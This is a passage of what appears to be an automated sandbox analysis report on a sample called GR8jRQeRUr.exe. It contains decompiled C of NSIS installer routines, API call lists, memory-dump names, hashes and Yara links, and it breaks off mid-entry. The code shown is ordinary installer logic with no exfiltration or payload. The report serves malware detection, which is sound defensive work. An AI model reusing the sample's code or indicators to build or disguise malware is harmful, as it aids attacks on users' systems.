                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                          			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                                                                                                          0x00405f20
                                                                                                                                                                          0x00405f2b
                                                                                                                                                                          0x00405f2f
                                                                                                                                                                          0x00405f36
                                                                                                                                                                          0x00405f42
                                                                                                                                                                          0x00405f52
                                                                                                                                                                          0x00405f54
                                                                                                                                                                          0x00405f6c
                                                                                                                                                                          0x00405f6d
                                                                                                                                                                          0x00405f74
                                                                                                                                                                          0x00405f75
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405f58
                                                                                                                                                                          0x00405f5f
                                                                                                                                                                          0x00405f67
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405f5f
                                                                                                                                                                          0x00405f77
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405f8b
                                                                                                                                                                          0x00405f44
                                                                                                                                                                          0x00405f4a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405f4a
                                                                                                                                                                          0x00405f31
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,74E5FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74E5FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                          • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74E5FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74E5FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74E5FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74E5FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                                                                                                          Strings
                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                          • API String ID: 3248276644-3916508600
                                                                                                                                                                          • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                          • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                                                                                                          • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                          • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405513, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                          			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}





                                                                                                                                                                          0x00405517
                                                                                                                                                                          0x00405521
                                                                                                                                                                          0x0040553d
                                                                                                                                                                          0x0040555f
                                                                                                                                                                          0x00405562
                                                                                                                                                                          0x00405568
                                                                                                                                                                          0x00405572
                                                                                                                                                                          0x00405573
                                                                                                                                                                          0x00405575
                                                                                                                                                                          0x0040557b
                                                                                                                                                                          0x0040557b
                                                                                                                                                                          0x00405585
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405593
                                                                                                                                                                          0x0040554a
                                                                                                                                                                          0x00405582
                                                                                                                                                                          0x00405582
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405582
                                                                                                                                                                          0x00405556
                                                                                                                                                                          0x00405558
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405558
                                                                                                                                                                          0x00405527
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040552e
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindowVisible.USER32 ref: 00405542
                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                                                                                                            • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                          • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                          • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                                                                                                          • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                          • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040640B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                          			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                                                                                                          0x00406419
                                                                                                                                                                          0x0040641b
                                                                                                                                                                          0x00406433
                                                                                                                                                                          0x00406438
                                                                                                                                                                          0x0040643d
                                                                                                                                                                          0x0040647b
                                                                                                                                                                          0x0040647b
                                                                                                                                                                          0x0040643f
                                                                                                                                                                          0x00406451
                                                                                                                                                                          0x0040645c
                                                                                                                                                                          0x00406462
                                                                                                                                                                          0x0040646d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040646d
                                                                                                                                                                          0x00406481

                                                                                                                                                                          APIs
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll), ref: 0040645C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                          • String ID: Call
                                                                                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                                                                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                                          • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                                          • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00403B57, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}







                                                                                                                                                                          0x00403b58
                                                                                                                                                                          0x00403b60
                                                                                                                                                                          0x00403b67
                                                                                                                                                                          0x00403b6a
                                                                                                                                                                          0x00403b6a
                                                                                                                                                                          0x00403b6c
                                                                                                                                                                          0x00403b71
                                                                                                                                                                          0x00403b78
                                                                                                                                                                          0x00403b7e
                                                                                                                                                                          0x00403b82
                                                                                                                                                                          0x00403b83
                                                                                                                                                                          0x00403b8b

                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,74E5FAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 00403B78
                                                                                                                                                                          Strings
                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                          • API String ID: 1100898210-3916508600
                                                                                                                                                                          • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                          • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                                                                                                          • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                          • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405F92, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                                                                                          0x00405fa2
                                                                                                                                                                          0x00405fa4
                                                                                                                                                                          0x00405fa7
                                                                                                                                                                          0x00405fd3
                                                                                                                                                                          0x00405fac
                                                                                                                                                                          0x00405fb5
                                                                                                                                                                          0x00405fba
                                                                                                                                                                          0x00405fc5
                                                                                                                                                                          0x00405fc8
                                                                                                                                                                          0x00405fe4
                                                                                                                                                                          0x00405fca
                                                                                                                                                                          0x00405fd1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405fd1
                                                                                                                                                                          0x00405fdd
                                                                                                                                                                          0x00405fe1
                                                                                                                                                                          0x00405fe1
                                                                                                                                                                          0x00405fdb
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                          • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                          • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                                                                                                          • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Analysis Process: GR8jRQeRUr.exe PID: 6312 Parent PID: 6416 GR8jRQeRUr.exeCOMMON

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 000AED60, Relevance: 4.6, Strings: 3, Instructions: 863COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586676877.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ,M!$,M!$-1-0
                                                                                                                                                                          • API String ID: 0-3420251757
                                                                                                                                                                          • Opcode ID: eb3efba04c4978ee52093b30ad9bfedeae7244082bea247e1c6a56b1ad5d0898
                                                                                                                                                                          • Instruction ID: ab14f9c10dbc575a65de5a4ec39494bbef12ae5fd9dd8348efd0ff02c28e5a1c
                                                                                                                                                                          • Opcode Fuzzy Hash: eb3efba04c4978ee52093b30ad9bfedeae7244082bea247e1c6a56b1ad5d0898
                                                                                                                                                                          • Instruction Fuzzy Hash: 61726834A002558FDB14DFB8C454BAEB7F2AF89304F158569D80AAB392DF34ED46CB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00069E50, Relevance: 4.4, Strings: 3, Instructions: 671COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586610335.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: del-viewscalefactor-l1-1-0$n-appmodel-usercontext-l1-1-0$te-ext-l1-2-0
                                                                                                                                                                          • API String ID: 0-2896828727
                                                                                                                                                                          • Opcode ID: 24a1e5c95e1c7e598b109b3e76b73f2406a73a7ae6e02b24a3f6921b1098dd45
                                                                                                                                                                          • Instruction ID: cdc100169f67abcd51e3fe30b2541f0a966f81edbea1c7699ddcfde9f4f59695
                                                                                                                                                                          • Opcode Fuzzy Hash: 24a1e5c95e1c7e598b109b3e76b73f2406a73a7ae6e02b24a3f6921b1098dd45
                                                                                                                                                                          • Instruction Fuzzy Hash: 3032CF34B042518FD759AB38886872E77E7ABC9315F15886DD90ACB381DF38DC46C792
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00105C58, Relevance: 4.3, Strings: 3, Instructions: 528COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: d+^l$d+^l$t,M!
                                                                                                                                                                          • API String ID: 0-2566221850
                                                                                                                                                                          • Opcode ID: 13bb4dd6bdf7eb88c22abe36c80da18e84a11894daee51634675656fe1de78c7
                                                                                                                                                                          • Instruction ID: f7ca07f421de88894d6dba972eb3081bca75f013ceb5b939b388df62f4740403
                                                                                                                                                                          • Opcode Fuzzy Hash: 13bb4dd6bdf7eb88c22abe36c80da18e84a11894daee51634675656fe1de78c7
                                                                                                                                                                          • Instruction Fuzzy Hash: 3312CF34A006148FCB15DFB8C854AAEBBF2BF89314F24856DD446EB391DB75AD06CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00065BA0, Relevance: 4.0, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586610335.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: DGM!$DGM!$dM3!
                                                                                                                                                                          • API String ID: 0-4017556165
                                                                                                                                                                          • Opcode ID: 966999284aaa6a3c6b5b7751f2790a0e41e46309a036cdc468b56a1b62990828
                                                                                                                                                                          • Instruction ID: 9c60bf4503dd192270904327c5b7e6b3842d2a1d70d730e3ed21c3a4b7dd3b49
                                                                                                                                                                          • Opcode Fuzzy Hash: 966999284aaa6a3c6b5b7751f2790a0e41e46309a036cdc468b56a1b62990828
                                                                                                                                                                          • Instruction Fuzzy Hash: AEA1AC34B007019FCB28DB74C864A2AB7E3AF85219F55896DD90ACB791DF35EC06CB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00062A48, Relevance: .9, Instructions: 864COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586610335.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6c29bd269d60058a1843db03c7aeddc43d54b946e94631199650a675b13a5946
                                                                                                                                                                          • Instruction ID: a97496263ae3befcd2a38ec78dfa6bda06bbf442efa851081aafaee17d833456
                                                                                                                                                                          • Opcode Fuzzy Hash: 6c29bd269d60058a1843db03c7aeddc43d54b946e94631199650a675b13a5946
                                                                                                                                                                          • Instruction Fuzzy Hash: DB727934B006158FCB14DF64C894AAEB7F2FF88314F158969E90A9B3A1DB35ED45CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 000609C0, Relevance: .8, Instructions: 755COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586610335.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 38cd99c7c3b568f4fa544acb974e721746ae94d8683186213457257c3120d712
                                                                                                                                                                          • Instruction ID: 42d6db6b8ee8b2533dba989169781359beebc0fbd353ad3e5bad26cbf39b6140
                                                                                                                                                                          • Opcode Fuzzy Hash: 38cd99c7c3b568f4fa544acb974e721746ae94d8683186213457257c3120d712
                                                                                                                                                                          • Instruction Fuzzy Hash: 6A620834B402588FCB55DF64C898BAEB7B2BF88301F1485A9D90AAB395DF349D85CF50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0010B01F, Relevance: .6, Instructions: 578COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 08202b8f830f7c192de407588e561f6d51d31f5e0eb0bdd6d0c000b302dbaac5
                                                                                                                                                                          • Instruction ID: 0c03a4a832ce366df03533a7d7a85407db2b207a8e6b2071fe15bd62c508a5b4
                                                                                                                                                                          • Opcode Fuzzy Hash: 08202b8f830f7c192de407588e561f6d51d31f5e0eb0bdd6d0c000b302dbaac5
                                                                                                                                                                          • Instruction Fuzzy Hash: F9424B31E5075A96EB219B64CC81BC9F371AF9A300F61C746F6587B5C1EBB0BAC58B40
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 000A6B00, Relevance: .5, Instructions: 521COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586676877.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a5a7dd70bd9ef01ed0bbf7f2e8c4d882c6bdbfb1bebcb7f2630ef87a98b17764
                                                                                                                                                                          • Instruction ID: 0cf8f6ae399462f30e09d5a15b363777f3630380871edc40acc325d1760dcb79
                                                                                                                                                                          • Opcode Fuzzy Hash: a5a7dd70bd9ef01ed0bbf7f2e8c4d882c6bdbfb1bebcb7f2630ef87a98b17764
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D229C30A042498FCB45DFA4C4D0A6EB7B2FF82314F54C9ADD50A9F266DB35AD85CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 000644F8, Relevance: .3, Instructions: 339COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586610335.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false
